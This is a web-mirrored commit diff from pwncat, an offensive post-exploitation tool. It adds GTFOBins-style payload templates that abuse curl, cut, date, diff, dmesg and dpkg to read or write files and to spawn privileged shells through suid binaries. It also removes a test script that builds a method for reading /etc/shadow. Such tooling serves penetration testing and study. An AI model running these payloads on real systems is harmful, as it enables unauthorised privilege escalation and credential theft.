mirror of
https://github.com/calebstewart/pwncat.git
synced 2024-11-27 19:04:15 +01:00
Merge branch 'master' of github.com:calebstewart/pwncat
This commit is contained in:
commit
ded22f18e4
@ -110,7 +110,7 @@
|
|||||||
},
|
},
|
||||||
{
|
{
|
||||||
"type": "read",
|
"type": "read",
|
||||||
"stream": "print",
|
"stream": "raw",
|
||||||
"payload": "{command} -c '{cat} {lfile}'",
|
"payload": "{command} -c '{cat} {lfile}'",
|
||||||
"suid": ["-p"],
|
"suid": ["-p"],
|
||||||
"exit": "{ctrl_d}"
|
"exit": "{ctrl_d}"
|
||||||
@ -465,8 +465,8 @@
|
|||||||
{
|
{
|
||||||
"type": "read",
|
"type": "read",
|
||||||
"stream": "base64",
|
"stream": "base64",
|
||||||
"payload": "{command}",
|
"payload": "{command} | {base64} -w 0",
|
||||||
"args": ["-s", "file://{lfile} --output - | {base64} -w 0"]
|
"args": ["-s", "file://{lfile} --output -"]
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
"type": "write",
|
"type": "write",
|
||||||
@ -485,8 +485,63 @@
|
|||||||
"type": "write",
|
"type": "write",
|
||||||
"stream": "base64",
|
"stream": "base64",
|
||||||
"payload": "TF=none; {command}; TF=$({mktemp}); {chmod} ugo+r $TF; {base64} -d > $TF; {command}; rm -f $TF",
|
"payload": "TF=none; {command}; TF=$({mktemp}); {chmod} ugo+r $TF; {base64} -d > $TF; {command}; rm -f $TF",
|
||||||
"args": ["-s", "file://$TF --output {lfile}"],
|
"args": ["-s", "file://$TF", "--output", "{lfile}"],
|
||||||
"exit": "{ctrl_d}"
|
"exit": "{ctrl_d}"
|
||||||
}
|
}
|
||||||
|
],
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"cut": [
|
||||||
|
{
|
||||||
|
"type": "read",
|
||||||
|
"stream": "print",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-d", "''", "-f1", "{lfile}"]
|
||||||
|
}
|
||||||
|
],
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"date": [
|
||||||
|
{
|
||||||
|
// This is a janky reader that relies on cut to fully carve out the output.
|
||||||
|
"type": "read",
|
||||||
|
"stream": "print",
|
||||||
|
"payload": "{command} | {cut} -d \":\" -f2- | while read line; do echo ${{line:14:-1}}; done",
|
||||||
|
"args": ["-f", "{lfile}", "+\"%M%M%M%M%M%M\"", "2>&1"]
|
||||||
|
}
|
||||||
|
],
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"diff": [
|
||||||
|
{
|
||||||
|
"type": "read",
|
||||||
|
"stream": "print",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["--line-format=%L", "/dev/null", "{lfile}"]
|
||||||
|
}
|
||||||
|
],
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"dmesg": [
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-H"],
|
||||||
|
"input": "!{shell} -p\n",
|
||||||
|
"exit": "exit\nq\n"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "read",
|
||||||
|
"stream": "print",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-rF", "{lfile}"]
|
||||||
|
}
|
||||||
|
],
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"dpkg": [
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-l"],
|
||||||
|
"input": "!{shell} -p\n",
|
||||||
|
"exit": "exit\nq\n"
|
||||||
|
}
|
||||||
]
|
]
|
||||||
|
|
||||||
}
|
}
|
@ -1,40 +0,0 @@
|
|||||||
#!/usr/bin/env python3
|
|
||||||
|
|
||||||
|
|
||||||
from pwncat.gtfobins import *
|
|
||||||
import subprocess
|
|
||||||
|
|
||||||
|
|
||||||
def which(path: str, quote=False):
|
|
||||||
try:
|
|
||||||
output = subprocess.check_output(f"which {path}", shell=True)
|
|
||||||
except subprocess.CalledProcessError:
|
|
||||||
return None
|
|
||||||
|
|
||||||
return output.decode("utf-8").strip()
|
|
||||||
|
|
||||||
|
|
||||||
gtfo = GTFOBins("data/gtfobins.json", which)
|
|
||||||
|
|
||||||
|
|
||||||
binary_to_test = "curl"
|
|
||||||
# capabilities_to_test = Capability.SHELL
|
|
||||||
capabilities_to_test = Capability.WRITE
|
|
||||||
# capabilities_to_test = Capability.WRITE
|
|
||||||
our_shell = "/bin/bash"
|
|
||||||
|
|
||||||
binary = gtfo.find_binary(binary_to_test)
|
|
||||||
print(binary)
|
|
||||||
print(vars(binary))
|
|
||||||
|
|
||||||
methods = binary.iter_methods(
|
|
||||||
which(binary_to_test), caps=capabilities_to_test, stream=None
|
|
||||||
)
|
|
||||||
for method in methods:
|
|
||||||
# print(method)
|
|
||||||
# print(method.build(shell=our_shell, suid=True))
|
|
||||||
print(method.build(lfile="/etc/shadow", suid=True)[0])
|
|
||||||
# print(method.build(lfile="/tmp/test", data="hello")[0])
|
|
||||||
|
|
||||||
# all_binaries = list(gtfo.iter_methods(Capability.SHELL))
|
|
||||||
# print(all_binaries[0].build(shell="/bin/bash", suid=True))
|
|
@ -26,7 +26,7 @@ class StoreConstOnce(argparse.Action):
|
|||||||
def __call__(self, parser, namespace, values, option_string=None):
|
def __call__(self, parser, namespace, values, option_string=None):
|
||||||
if hasattr(self, "__" + self.dest + "_seen"):
|
if hasattr(self, "__" + self.dest + "_seen"):
|
||||||
raise argparse.ArgumentError(self, "only one action may be specified")
|
raise argparse.ArgumentError(self, "only one action may be specified")
|
||||||
setattr(self, "__" + self.dest + "_seen", True)
|
setattr(namespace, "__" + self.dest + "_seen", True)
|
||||||
setattr(namespace, self.dest, self.const)
|
setattr(namespace, self.dest, self.const)
|
||||||
|
|
||||||
|
|
||||||
|
Loading…
Reference in New Issue
Block a user